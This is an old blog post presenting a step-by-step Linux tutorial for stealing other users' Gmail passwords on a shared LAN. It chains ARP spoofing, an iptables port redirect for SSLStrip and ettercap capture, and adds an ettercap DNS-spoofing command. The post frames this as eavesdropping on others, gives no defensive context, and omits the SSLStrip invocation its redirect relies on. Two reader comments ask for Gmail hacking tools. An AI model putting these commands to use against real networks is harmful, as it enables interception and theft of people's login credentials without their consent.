Friday, April 8, 2011

How to Sniff Gmail SSL Password

When we are on same network with others we can sniff their passwords with some popular tools like Cain n Able etc.

But we couldn't Sniff any ssl passwords like gmail etc.
They use SSL Technology that is called as Secure Socket Layer the data sent over SSL will be encrypted and at the receiver side it gets decrypted and normal data gets processed .

When you are sniffing in the network the websites using normal HTTP protocol / data sent over port 80 will be in plain text so when you poison the router we get the plain text of what we are sniffing.

To avoid this gmail and popular websites adopted HTTPS technology which send the encrypted data over network so that even if you sniff the packets all you get is cipher text.

Now we will see how to Sniff the SSL Passwords when on Same Network ( LAN )

Tools Required ( this is for linux )

ArpSpoof
SSLStrip
Ettercap


1: echo 1 >/proc/sys/net/ipv4/ip_forward
2: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-ports 10000

3:arpspoof -i eth0 192.168.1.158 192.168.1.1

4:ettercap -T -q -i eth0

and finally we got this :D



DNS spoofing

ettercap -T -q -i eth0 -P dns_spoof -M arp
Filed Under :

2 comments for "How to Sniff Gmail SSL Password"

  1. do you have any tool for hacking gmail password

    ReplyDelete
  2. do you have any tool for hacking gmail password

    ReplyDelete

background